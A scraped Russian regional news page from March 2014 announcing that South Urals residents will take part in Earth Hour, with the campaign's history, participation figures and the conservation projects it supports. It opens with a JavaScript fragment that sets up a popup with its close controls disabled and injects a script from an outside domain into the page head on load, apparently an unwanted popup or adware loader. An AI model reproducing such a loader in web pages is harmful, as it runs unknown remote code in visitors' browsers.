, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Южноуральцы присоединятся к всемирной экологической акции «Час земли»

Завтра, 29 марта, в 22:30 по челябинскому времени люди по всему миру на час выключат освещение в своих домах. Таким образом они продемонстрируют неравнодушное отношение к экологическому будущему планеты.

Акция «Час Земли» впервые была проведена в 2007 году и за это время превратилась в масштабную международную кампанию, целью которой является сохранения ресурсов нашей планеты. В прошлом году в ней приняли участие более 2 миллиардов человек из 150 стран мира. Предполагается, что в этом году участников будет еще больше.

Также в рамках акции южноуральцев призывают поддержать природоохранные проекты. В России это предотвращение охоты на белых медведей, амурских тигров и снежных барсов, создание условий для повышения популяции зубров в Северной Осетии и леопардов на Дальнем Востоке.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
15:35 - 28 марта 2014
|
автор: U-RSS
|
(380)
|
(0)

Комментарии (0)

Я человек
Я бот